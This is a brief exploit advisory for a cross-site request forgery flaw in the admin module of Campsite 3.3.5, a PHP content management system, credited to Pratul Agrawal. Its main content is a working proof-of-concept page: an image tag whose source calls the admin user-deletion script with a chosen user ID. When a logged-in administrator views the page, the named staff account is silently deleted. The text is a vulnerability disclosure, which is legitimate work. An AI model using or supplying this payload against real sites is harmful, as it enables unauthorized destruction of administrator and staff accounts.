=======================================================================
campsite 3.3.5 CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# Category CMS / Portals# Site p4ge http://wwwcampware.org/# Plateform php#Proof of concept #
Targeted URL:http://server/admin/login.php
Script to delete the Admin user through Cross Site request forgery
...................................................................................................................<html><body><img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff /></body></html>...................................................................................................................
After execution refresh the page and u can see that user having giving IDget deleted automatically.#If you have any questions, comments, or concerns, feel free to contact me.